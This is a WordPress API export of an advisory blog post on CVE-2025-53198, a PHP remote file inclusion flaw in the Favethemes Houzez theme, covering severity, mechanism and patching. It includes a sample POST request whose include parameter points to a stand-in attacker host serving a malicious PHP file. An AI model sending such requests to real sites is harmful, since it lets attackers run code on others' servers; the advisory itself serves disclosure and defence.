{"id":71664,"date":"2025-09-06T04:59:22","date_gmt":"2025-09-06T04:59:22","guid":{"rendered":""},"modified":"2025-09-29T02:50:19","modified_gmt":"2025-09-29T08:50:19","slug":"cve-2025-53198-php-remote-file-inclusion-vulnerability-in-favethemes-houzez","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-53198-php-remote-file-inclusion-vulnerability-in-favethemes-houzez\/","title":{"rendered":"<strong>CVE-2025-53198: PHP Remote File Inclusion Vulnerability in Favethemes Houzez<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>A significant security vulnerability has been identified in the Favethemes Houzez PHP program, which affects all versions up to 4.0.4. This vulnerability, identified as CVE-2025-53198, is related to an improper control of filename for Include\/Require Statement, also known as a PHP Remote File Inclusion. Given the ubiquity of PHP in web development, and particularly the widespread usage of Favethemes Houzez, this <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-55731-sql-injection-vulnerability-in-frappe-framework-leading-to-potential-data-leakage\/\"  data-wpil-monitor-id=\"79280\">vulnerability could potentially<\/a> affect a large number of websites and their users. The severity of this issue is further compounded by its <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-42957-critical-backdoor-vulnerability-in-sap-s-4hana-exposes-systems-to-potential-compromise\/\"  data-wpil-monitor-id=\"79598\">potential for system<\/a> compromise or data leakage.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-53198<br \/>\nSeverity: High (8.1 CVSS Score)<br \/>\nAttack Vector: Network<br \/>\nPrivileges Required: Low<br \/>\nUser Interaction: None<br \/>\nImpact: <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-47136-integer-underflow-vulnerability-in-indesign-desktop-versions-leading-to-potential-system-compromise\/\"  data-wpil-monitor-id=\"79729\">Potential system<\/a> compromise or data leakage<\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-2444131490\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 700px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 20px; font-weight: 600; display: flex; align-items: center;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 8px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 40px; height: 40px;\" \/>\r\n    <\/a>\r\n    A new way to communicate\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 12px;\">\r\n    Ameeba Chat is built on encrypted identity, not personal profiles.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 16px;\">\r\n    Message, call, share files, and coordinate with identities kept separate.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 20px;\">\r\n    <li>\u2022 Encrypted identity<\/li>\r\n    <li>\u2022 Ameeba Chat authenticates access<\/li>\r\n    <li>\u2022 Aliases and categories<\/li>\r\n    <li>\u2022 End-to-end encrypted chat, calls, and files<\/li>\r\n    <li>\u2022 Secure notes for sensitive information<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px;\">\r\n    Private communication, rethought.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Download Ameeba Chat<\/a>\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Learn More<\/a>\r\n  <\/div>\r\n<\/div>\r\n<\/div>\n<p>Product | Affected Versions<\/p>\n<p>Favethemes Houzez | Up to 4.0.4<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>The <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-50870-incorrect-access-control-vulnerability-in-institute-of-current-students-1-0\/\"  data-wpil-monitor-id=\"79309\">vulnerability arises from improper control<\/a> of filename for Include\/Require Statement in the PHP program. This can allow an attacker to inject a file from a remote server, circumventing the need for <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-3671-critical-local-file-inclusion-vulnerability-in-wpgym-wordpress-gym-management-system-plugin\/\"  data-wpil-monitor-id=\"80511\">local file inclusion<\/a>. In essence, the attacker can manipulate the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-25174-critical-php-remote-file-inclusion-vulnerability-in-beeteam368-extensions\/\"  data-wpil-monitor-id=\"81097\">PHP &#8216;include&#8217; or &#8216;require&#8217; statement to reference a specific file<\/a> on their own server, effectively running their own code on the targeted system.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-2978825721\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>Here&#8217;s a conceptual example of how the vulnerability might be exploited:<\/p>\n<pre><code class=\"\" data-line=\"\">POST \/vulnerable\/endpoint HTTP\/1.1\nHost: target.example.com\nContent-Type: application\/x-www-form-urlencoded\ninclude=http:\/\/attacker.com\/malicious_file.php<\/code><\/pre>\n<p>In this hypothetical example, the attacker sends a POST <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-52797-critical-cross-site-request-forgery-csrf-vulnerability-in-josepsitjar-storymap\/\"  data-wpil-monitor-id=\"79366\">request to the vulnerable<\/a> endpoint on the target server. The &#8216;include&#8217; parameter references a <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-7390-malicious-client-bypass-of-opc-https-server-certificate-trust-check\/\"  data-wpil-monitor-id=\"81872\">malicious PHP file hosted on the attacker&#8217;s server<\/a>. If the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-53727-sql-server-vulnerability-leading-to-privilege-escalation\/\"  data-wpil-monitor-id=\"79548\">server is vulnerable<\/a>, it would download and execute the malicious PHP file, granting the attacker control over the server.<\/p>\n<p><strong>Mitigation<\/strong><\/p>\n<p>To mitigate the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-55293-high-risk-vulnerability-in-meshtastic-s-mesh-networking-solution\/\"  data-wpil-monitor-id=\"81334\">risk posed by this vulnerability<\/a>, users are urged to apply the patch provided by the vendor. In cases where immediate patching is not possible, the use of a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can provide temporary mitigation by monitoring and potentially blocking suspicious activities. However, these measures should be considered temporary, and it is strongly recommended that the vendor&#8217;s patch be applied as soon as <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-54742-data-deserialization-vulnerability-in-wpevently-leading-to-possible-system-compromise\/\"  data-wpil-monitor-id=\"86427\">possible to fully address the vulnerability<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview A significant security vulnerability has been identified in the Favethemes Houzez PHP program, which affects all versions up to 4.0.4. This vulnerability, identified as CVE-2025-53198, is related to an improper control of filename for Include\/Require Statement, also known as a PHP Remote File Inclusion. Given the ubiquity of PHP in web development, and particularly [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-71664","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/71664","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=71664"}],"version-history":[{"count":11,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/71664\/revisions"}],"predecessor-version":[{"id":79227,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/71664\/revisions\/79227"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=71664"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=71664"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=71664"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=71664"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=71664"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=71664"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=71664"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=71664"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=71664"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}